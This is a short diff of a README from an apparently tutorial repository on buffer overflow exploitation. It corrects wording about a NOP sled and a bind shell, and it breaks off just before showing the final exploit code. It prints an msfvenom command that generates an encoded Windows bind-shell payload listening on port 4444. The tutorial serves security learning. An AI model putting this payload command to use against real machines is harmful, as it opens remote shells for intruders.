ahsan-aziz/Buffer-Overflow/README.md

 ```

-I am adding 16-bytes of no operations as I am using encoding to avoid null bytes in the paylaod.
-The malicious code can be anything, I am using a bidn shell, it will open port 4444 where we can connect.
+I am adding 16-bytes of no operations as I am encoding the payload to avoid null bytes.
+The malicious code can be anything, I am using a bind shell, it will open port 4444 where we can connect.
 The msfvenom command for this is (-b is for bad character "\x00" and "x86/shikata_ga_nai" is the encoding we're using):

 ```
 msfvenom -p windows/shell_bind_tcp LPORT=4444 -f c -b "\x00" –e x86/shikata_ga_nai
 ```

 Our final code would look like as follows:

 ```